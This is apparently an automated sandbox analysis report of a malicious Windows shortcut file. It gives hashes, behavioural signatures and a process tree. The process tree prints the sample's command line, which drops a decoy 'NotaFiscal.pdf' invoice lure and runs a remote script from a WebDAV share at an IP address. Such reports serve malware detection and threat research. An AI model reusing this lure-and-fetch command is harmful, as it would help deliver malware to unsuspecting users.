Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
14-04-2024 01:36
Static task
static1
Behavioral task
behavioral1
Sample
a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk
Resource
win10v2004-20240226-en
General
-
Target
a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk
-
Size
3KB
-
MD5
cd4f87e63be918ec6ef8d39082669834
-
SHA1
77a144bb45fff156050324b8318741bcae27d9f8
-
SHA256
a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef
-
SHA512
877e9c3d0157db9c73729f94155cf6481257d6f64dbe564678cc1e35f471b20434fa27ef901b3c1b103fd4d6b715e906fe641faba6c3e9709caf05175de0e1c2
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
AcroRd32.exepid process 2528 AcroRd32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 2528 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
AcroRd32.exepid process 2528 AcroRd32.exe 2528 AcroRd32.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2908 wrote to memory of 2400 2908 cmd.exe cmd.exe PID 2908 wrote to memory of 2400 2908 cmd.exe cmd.exe PID 2908 wrote to memory of 2400 2908 cmd.exe cmd.exe PID 2400 wrote to memory of 2528 2400 cmd.exe AcroRd32.exe PID 2400 wrote to memory of 2528 2400 cmd.exe AcroRd32.exe PID 2400 wrote to memory of 2528 2400 cmd.exe AcroRd32.exe PID 2400 wrote to memory of 2528 2400 cmd.exe AcroRd32.exe PID 2400 wrote to memory of 2564 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 2564 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 2564 2400 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /min /c "echo Visualizacao indisponivel > C:\Users\Admin\downloads\NotaFiscal.pdf & start C:\Users\Admin\downloads\NotaFiscal.pdf & start /min cmd.exe /c "\\191.239.116.217@80\Documentos\files\a3.cmd""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd.exe /c "\\191.239.116.217@80\Documentos\files\a3.cmd"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEventsFilesize
3KB
MD5f09b63daf6df766e54d259b4caa62af3
SHA18f95932effe7cde26cac535d684dedfae4002655
SHA2567350eedd926ce61e5068d150beac2d5da3d030481b65422ddaf9d0281c95b38a
SHA512820c8a57b6f7d7d1466aa91f6bbc223c40e4e95676625dbe059a94ababb88a1c236c24f9c398cd442ab31418803d4ba13ef50bc35ebacaa2a7e1c9c46d02dabf
-
C:\Users\Admin\Downloads\NotaFiscal.pdfFilesize
29B
MD5823a9caa296579d6a40cd5195d969727
SHA15592813787ecff9133229439498d624339c07ece
SHA25660b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e
SHA51277ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc